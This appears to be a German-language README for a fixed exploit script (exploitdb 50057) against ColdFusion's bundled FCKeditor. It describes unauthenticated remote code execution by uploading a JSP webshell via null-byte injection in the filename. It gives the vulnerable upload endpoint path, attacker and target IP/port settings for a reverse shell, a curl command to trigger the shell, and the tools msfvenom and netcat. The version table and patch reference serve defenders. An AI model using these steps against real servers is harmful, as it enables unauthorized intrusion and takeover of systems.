
Fix für ein nicht funktionierendes Exploit-Skript auf exploitdb (50057.py)
Nicht authentifizierte Remote-Code-Ausführung durch beliebigen Datei-Upload in der FCKeditor-Komponente, die mit ColdFusion gebündelt ist. Der Datei-Upload-Endpunkt akzeptiert eine Null-Byte-Injektion im filename-Parameter, wodurch eine JSP- Webshell hochgeladen und direkt vom Server ausgeführt werden kann.
| Version | Status |
|---|
| ColdFusion 8.0 | Anfällig |
| ColdFusion 8.0.1 | Anfällig |
| ColdFusion 9.0 | Anfällig* |
| ColdFusion MX 6.x | Anfällig |
| ColdFusion MX 7.x | Anfällig |
| ColdFusion 9.0.1+ | Gepatcht |
| ColdFusion 10+ | Nicht betroffen |
*ColdFusion 9.0 anfällig, wenn die FCKeditor-Komponente nicht entfernt/aktualisiert wurde.
Patch: Adobe Security Bulletin APSB09-09 (Juli 2009).
Bearbeiten Sie die Variablen am Anfang des Skripts:
lhost = 'YOUR_IP'
lport = 4444
rhost = 'TARGET_IP'
rport = 8500
Ausführen:
python3 poc.py
Das Skript wird:
Wenn die Shell nicht innerhalb weniger Sekunden eintrifft, lösen Sie sie manuell aus:
curl http://<rhost>:<rport>/userfiles/file/<filename>.jsp
Der Dateiname wird nach dem Upload auf stdout ausgegeben.
msfvenom
netcat (nc)
python3
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm